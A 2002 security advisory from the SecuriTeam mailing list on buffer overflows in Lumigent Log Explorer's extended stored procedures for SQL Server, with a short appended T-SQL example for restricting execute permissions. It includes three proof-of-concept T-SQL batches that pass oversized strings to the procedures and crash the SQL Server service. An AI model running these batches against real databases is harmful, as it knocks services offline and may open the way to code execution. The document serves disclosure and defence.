[NT] Lumigent Log Explorer Extended Stored Procedures Buffer Overflow
From: support@securiteam.com Date: 06/19/02
From: support@securiteam.com To: list@securiteam.com Date: Wed, 19 Jun 2002 09:57:04 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Lumigent Log Explorer Extended Stored Procedures Buffer Overflow
------------------------------------------------------------------------
SUMMARY
Lumigent Log Explorer is a transaction log explorer for Microsoft SQL
Server 7/2000. It ships with extended stored procedures implemented in
xp_logattach.dll. Some of them suffer from buffer overflows that crash
the SQL Server service and potentially allow arbitrary code execution.
DETAILS
Vulnerable systems:
* Lumigent Log Explorer version 3
Example:
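Below is sample code that crashes SQL Server:

  -- Batch 1: 800-byte argument to xp_logattach_StartProf
  declare @bo varchar(8000)
  set @bo = replicate('A', 800)
  exec xp_logattach_StartProf @bo

  -- Batch 2 (run separately): same argument to xp_logattach_setport
  declare @bo varchar(8000)
  set @bo = replicate('A', 800)
  exec xp_logattach_setport @bo

  -- Batch 3 (run separately): same argument to xp_logattach
  declare @bo varchar(8000)
  set @bo = replicate('A', 800)
  exec xp_logattach @bo
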
Procedures can be run only by dbo (master) by default.
Vendor response:
This issue will be fixed in our next scheduled maintenance release,
available in two to three weeks.
Workaround:
In the meantime, we recommend that you grant execute permissions on
Lumigent's extended stored procedures to trusted logins only (a useful
policy in any case). This prevents untrusted users from invoking stored
procedures with malicious intent.
ADDITIONAL INFORMATION
The information has been provided by <mailto:jimmers@yandex.ru> Martin
Rakhmanoff and <mailto:murray@lumigent.com> Murray S. Mazer.
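
The workaround above, restricting execute permission on the extended stored procedures to trusted logins, can be checked and applied with T-SQL such as the following. This is an added example, not part of the original advisory or the vendor's own script. It assumes the SQL Server 7/2000 system tables in master, that all of the product's extended procedures share the xp_logattach name prefix (only the three named above are confirmed by the advisory), and a hypothetical trusted database user named log_admin.

```sql
-- Added example: audit and restrict EXECUTE on the Lumigent extended procedures.
-- Assumes SQL Server 7/2000 system tables; run as a sysadmin.
USE master
GO

-- 1. Extended procedures (xtype 'X') in master whose names start with
--    xp_logattach. [_] matches a literal underscore; a bare _ is a LIKE
--    wildcard. The shared prefix is an assumption, not stated by the advisory.
SELECT name
FROM   sysobjects
WHERE  xtype = 'X'
  AND  name LIKE 'xp[_]logattach%'
ORDER  BY name
GO

-- 2. Explicit EXECUTE permission entries on those procedures.
--    action 224 = EXECUTE; protecttype 204/205 = grant, 206 = deny.
--    No rows means no explicit grants exist, which matches the default
--    described in the advisory. Any row naming public, guest or an
--    application account needs review.
SELECT o.name           AS procedure_name,
       USER_NAME(p.uid) AS grantee,
       CASE p.protecttype
            WHEN 204 THEN 'GRANT WITH GRANT OPTION'
            WHEN 205 THEN 'GRANT'
            WHEN 206 THEN 'DENY'
       END              AS permission_state
FROM   sysobjects  o
JOIN   sysprotects p ON p.id = o.id
WHERE  o.xtype  = 'X'
  AND  o.name LIKE 'xp[_]logattach%'
  AND  p.action = 224
ORDER  BY o.name, grantee
GO

-- 3. Remove any EXECUTE permission held by public on the three procedures
--    the advisory names.
REVOKE EXECUTE ON xp_logattach           FROM public
REVOKE EXECUTE ON xp_logattach_StartProf FROM public
REVOKE EXECUTE ON xp_logattach_setport   FROM public
GO

-- 4. Grant EXECUTE only to a trusted user. log_admin is a hypothetical
--    placeholder for a database user that already exists in master.
GRANT EXECUTE ON xp_logattach           TO log_admin
GRANT EXECUTE ON xp_logattach_StartProf TO log_admin
GRANT EXECUTE ON xp_logattach_setport   TO log_admin
GO
```

Re-running the query in step 2 after the change should list only the trusted user as a grantee.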